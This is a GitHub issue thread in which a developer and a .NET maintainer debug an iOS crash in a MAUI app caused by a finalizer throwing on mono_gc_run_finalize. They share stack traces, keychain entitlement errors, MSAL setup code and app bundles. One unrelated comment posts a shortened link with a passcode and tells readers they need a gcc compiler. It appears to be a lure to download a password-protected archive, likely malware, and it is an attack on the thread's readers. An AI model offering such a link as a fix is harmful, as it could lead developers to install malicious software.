### ISSUE TITLE
mono_gc_run_finalize iOS crash

### ISSUE THREAD

**Issue by timmac-qmc** [dotnet/maui#24607]
### Description

I'm getting some crash reports from a small number of users when opening our MAUI app on iOS with the following stack trace:

```
0   libsystem_kernel.dylib        	0x00000001e74eb42c __pthread_kill + 8 (:-1)
1   libsystem_pthread.dylib       	0x00000001fb28ac0c pthread_kill + 268 (pthread.c:1721)
2   libsystem_c.dylib             	0x00000001a638eba0 abort + 180 (abort.c:118)
3   QMCMobile                     	0x00000001031f29ac 0x102a80000 + 7809452
4   QMCMobile                     	0x000000010317630c mono_runtime_setup_stat_profiler + 0 (mini-posix.c:662)
5   libsystem_platform.dylib      	0x00000001fb1cee9c _sigtramp + 56 (sigtramp.c:116)
6   libsystem_pthread.dylib       	0x00000001fb28ac0c pthread_kill + 268 (pthread.c:1721)
7   libsystem_c.dylib             	0x00000001a638eba0 abort + 180 (abort.c:118)
8   QMCMobile                     	0x0000000102ea9dd4 print_callback(char const*, int) + 0 (runtime.m:1201)
9   QMCMobile                     	0x000000010302bfd0 monoeg_g_logv_nofree + 212 (goutput.c:167)
10  QMCMobile                     	0x000000010302c040 monoeg_assertion_message + 40 (goutput.c:207)
11  QMCMobile                     	0x00000001030f4bac mono_unhandled_exception_checked + 0 (object.c:4540)
12  QMCMobile                     	0x00000001031030c4 mono_thread_internal_unhandled_exception + 48 (threads.c:4673)
13  QMCMobile                     	0x0000000103125ec4 mono_gc_run_finalize + 684 (gc.c:352)
14  QMCMobile                     	0x0000000103050624 sgen_gc_invoke_finalizers + 192 (sgen-gc.c:2852)
15  QMCMobile                     	0x00000001031270d8 finalizer_thread + 776 (gc.c:905)
16  QMCMobile                     	0x000000010310395c start_wrapper + 352 (threads.c:1271)
17  libsystem_pthread.dylib       	0x00000001fb28906c _pthread_start + 136 (pthread.c:931)
18  libsystem_pthread.dylib       	0x00000001fb2840d8 thread_start + 8 (:-1)
```

Complete crash report attached
[2024-09-05_11-36-23.7199_+0100-a81f98656fd14cd6ee1031f7089dfc2e6b30f05c.txt](https://github.com/user-attachments/files/16893878/2024-09-05_11-36-23.7199_%2B0100-a81f98656fd14cd6ee1031f7089dfc2e6b30f05c.txt)

### Steps to Reproduce

Unknown

### Version with bug

8.0.82 SR8.2

### Is this a regression from previous behavior?

Not sure, did not test other versions

### Last version that worked well

Unknown/Other

### Affected platforms

iOS

### Affected platform versions

iOS 17.*+

### Did you find any workaround?

No

**Comment by sanketkorde** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by drasticactions** [comment]
This could be an issue in the runtime, considering that it seems that something is throwing in `mono_gc_run_finalize`. This may not be a MAUI UI specific issue. @rolfbjarne What do you think?

**Comment by rolfbjarne** [comment]
The problem is that a finalizer threw an exception:

```
11  QMCMobile                     	0x00000001030f4bac mono_unhandled_exception_checked + 0 (object.c:4540)
12  QMCMobile                     	0x00000001031030c4 mono_thread_internal_unhandled_exception + 48 (threads.c:4673)
13  QMCMobile                     	0x0000000103125ec4 mono_gc_run_finalize + 684 (gc.c:352)
```

The trick is figuring out more information about the exception.

My advice would be to add event listeners to both of these:

* [AppDomain.UnhandledException](https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.unhandledexception?view=net-8.0)
* [ObjCRuntime.Runtime.MarshalManagedException](https://learn.microsoft.com/en-us/dotnet/api/objcruntime.runtime.marshalmanagedexception?view=xamarin-ios-sdk-12) (see also https://github.com/MicrosoftDocs/xamarin-docs/blob/live/docs/ios/platform/exception-marshaling.md#events)

And log/upload any results to your telemetry solution of choice.

**Comment by timmac-qmc** [comment]
> The problem is that a finalizer threw an exception:
> 
> ```
> 11  QMCMobile                     	0x00000001030f4bac mono_unhandled_exception_checked + 0 (object.c:4540)
> 12  QMCMobile                     	0x00000001031030c4 mono_thread_internal_unhandled_exception + 48 (threads.c:4673)
> 13  QMCMobile                     	0x0000000103125ec4 mono_gc_run_finalize + 684 (gc.c:352)
> ```
> 
> The trick is figuring out more information about the exception.
> 
> My advice would be to add event listeners to both of these:
> 
> * [AppDomain.UnhandledException](https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.unhandledexception?view=net-8.0)
> * [ObjCRuntime.Runtime.MarshalManagedException](https://learn.microsoft.com/en-us/dotnet/api/objcruntime.runtime.marshalmanagedexception?view=xamarin-ios-sdk-12) (see also https://github.com/MicrosoftDocs/xamarin-docs/blob/live/docs/ios/platform/exception-marshaling.md#events)
> 
> And log/upload any results to your telemetry solution of choice.

Implemented and nothing appears to be getting captured...

**Comment by timmac-qmc** [comment]
May be unrelated but after trawling through logs the following is showing consistently:

```
QMCMobile[4349]/1#6 LF=0 copy_matching Error Domain=NSOSStatusErrorDomain Code=-34018 "Client explicitly specifies access group com.microsoft.adalcache but is only entitled for (
    "2KLF58357X.com.microsoft.adalcache",
    "2KLF58357X.com.qmc.qmcmobile"
)" UserInfo={numberOfErrorsDeep=0, NSDescription=Client explicitly specifies access group com.microsoft.adalcache but is only entitled for (
    "2KLF58357X.com.microsoft.adalcache",
    "2KLF58357X.com.qmc.qmcmobile"
)}
```

I'm using the following code as given by the documentation so I'm not sure why this error is occurring? 
Documentation clearly states that TeamID is prepended to the security group string.

```
#elif IOS
                authenticationClient = PublicClientApplicationBuilder
                    .Create(_azureADConfig.ClientId)
                    .WithAuthority(AzureCloudInstance.AzurePublic, _azureADConfig.TenantId) // Only allow accounts in the tenant to authenticate
                    .WithIosKeychainSecurityGroup("com.microsoft.adalcache")
                    .WithRedirectUri($"msal{_azureADConfig.ClientId}://auth")
                    .Build();
#else
```

**Comment by rolfbjarne** [comment]
> May be unrelated but after trawling through logs the following is showing consistently:
> 
> ```
> QMCMobile[4349]/1#6 LF=0 copy_matching Error Domain=NSOSStatusErrorDomain Code=-34018 "Client explicitly specifies access group com.microsoft.adalcache but is only entitled for (
>     "2KLF58357X.com.microsoft.adalcache",
>     "2KLF58357X.com.qmc.qmcmobile"
> )" UserInfo={numberOfErrorsDeep=0, NSDescription=Client explicitly specifies access group com.microsoft.adalcache but is only entitled for (
>     "2KLF58357X.com.microsoft.adalcache",
>     "2KLF58357X.com.qmc.qmcmobile"
> )}
> ```
> 
> I'm using the following code as given by the documentation so I'm not sure why this error is occurring? Documentation clearly states that TeamID is prepended to the security group string.
> 
> ```
> #elif IOS
>                 authenticationClient = PublicClientApplicationBuilder
>                     .Create(_azureADConfig.ClientId)
>                     .WithAuthority(AzureCloudInstance.AzurePublic, _azureADConfig.TenantId) // Only allow accounts in the tenant to authenticate
>                     .WithIosKeychainSecurityGroup("com.microsoft.adalcache")
>                     .WithRedirectUri($"msal{_azureADConfig.ClientId}://auth")
>                     .Build();
> #else
> ```
> 
> EDIT: Seems I'm not the first user to encounter this:
> 
> [AzureAD/microsoft-authentication-library-for-dotnet#1562](https://github.com/AzureAD/microsoft-authentication-library-for-dotnet/issues/1562)

This is not the direct cause of the crash (it may cause other issues in your app though; and technically it may even be an indirect cause of the crash if it's causing exceptions on the finalizer thread).

**Comment by timmac-qmc** [comment]
> Can you share the device log for a crash + the corresponding crash report?

Device log attached, it's not currently creating a native crash report even though the app crashes to home screen. Can only assume the code above is somehow preventing that...

[crash_log.txt](https://github.com/user-attachments/files/16942109/crash_log.txt)

**Comment by rolfbjarne** [comment]
> > Can you share the device log for a crash + the corresponding crash report?
> 
> Just noticed in the log
> 
> Could not find `System.Runtime.InteropServices.JavaScript` referenced by assembly `QMCMobile, Version=2.0.7.0, Culture=neutral, PublicKeyToken=null`.

That could be a good place to start looking, although it's strange that this didn't cause a build failure.

I didn't find anything else in the log, so if that doesn't lead anywhere, can you zip up the .app that's installed on your device and attach it / link to it here (it should be somewhere inside the bin directory of your project folder)?

**Comment by timmac-qmc** [comment]
> > > Can you share the device log for a crash + the corresponding crash report?
> > 
> > 
> > Just noticed in the log
> > Could not find `System.Runtime.InteropServices.JavaScript` referenced by assembly `QMCMobile, Version=2.0.7.0, Culture=neutral, PublicKeyToken=null`.
> 
> That could be a good place to start looking, although it's strange that this didn't cause a build failure.
> 
> I didn't find anything else in the log, so if that doesn't lead anywhere, can you zip up the .app that's installed on your device and attach it / link to it here (it should be somewhere inside the bin directory of your project folder)?

Resolved using config below, app still crashes.

```
<ItemGroup>
	<TrimmerRootAssembly Include="System.Runtime.InteropServices.JavaScript" />
</ItemGroup>

```

No crash report is currently being generated on the device.
[crash_log.txt](https://github.com/user-attachments/files/16943209/crash_log.txt)

[QMCMobile.app.zip](https://github.com/user-attachments/files/16943239/QMCMobile.app.zip)

**Comment by rolfbjarne** [comment]
> [](https://github.com/user-attachments/files/16943209/crash_log.txt)
> 
> [QMCMobile.app.zip](https://github.com/user-attachments/files/16943239/QMCMobile.app.zip)

All files in this zip are zero-sized, so I assume you're building from Windows.

In that case, you need to get the real app contents from your macOS machine.

It's somewhere in this directory:

> ~/Library/Caches/Xamarin/mtbs/builds/(project name)

**Comment by timmac-qmc** [comment]
> .app

Folder structure is a bit different but hopefully this is what you need:
https://mega.nz/file/XYAkRLZT#X1q71AHgPB-SPRWX5eLdclC-3_xJrBTlCZJ6U7QVFYg

**Comment by rolfbjarne** [comment]
> > .app
> 
> Folder structure is a bit different but hopefully this is what you need: [mega.nz/file/XYAkRLZT#X1q71AHgPB-SPRWX5eLdclC-3_xJrBTlCZJ6U7QVFYg](https://mega.nz/file/XYAkRLZT#X1q71AHgPB-SPRWX5eLdclC-3_xJrBTlCZJ6U7QVFYg)

TIL that I can't access mega.nz for security reasons.

Is there any possibility you can use another file sharing service?

**Comment by timmac-qmc** [comment]
> TIL that I can't access mega.nz for security reasons.
> 
> Is there any possibility you can use another file sharing service?

https://1drv.ms/u/s!Ar58XZTcMv9RiSm-cY3EyfHhj3tw?e=3xNVjn

**Comment by rolfbjarne** [comment]
> > TIL that I can't access mega.nz for security reasons.
> > Is there any possibility you can use another file sharing service?
> 
> [1drv.ms/u/s!Ar58XZTcMv9RiSm-cY3EyfHhj3tw?e=3xNVjn](https://1drv.ms/u/s!Ar58XZTcMv9RiSm-cY3EyfHhj3tw?e=3xNVjn)

I get the login screen on my iPad.

Is the crash supposed to happen before the login screen shows up?

**Comment by timmac-qmc** [comment]
> > > TIL that I can't access mega.nz for security reasons.
> > > Is there any possibility you can use another file sharing service?
> > 
> > 
> > [1drv.ms/u/s!Ar58XZTcMv9RiSm-cY3EyfHhj3tw?e=3xNVjn](https://1drv.ms/u/s!Ar58XZTcMv9RiSm-cY3EyfHhj3tw?e=3xNVjn)
> 
> I get the login screen on my iPad.
> 
> Is the crash supposed to happen before the login screen shows up?

This is the exact same app I uploaded:


https://github.com/user-attachments/assets/8716a33f-41ab-4d50-b478-76d7cb48970f
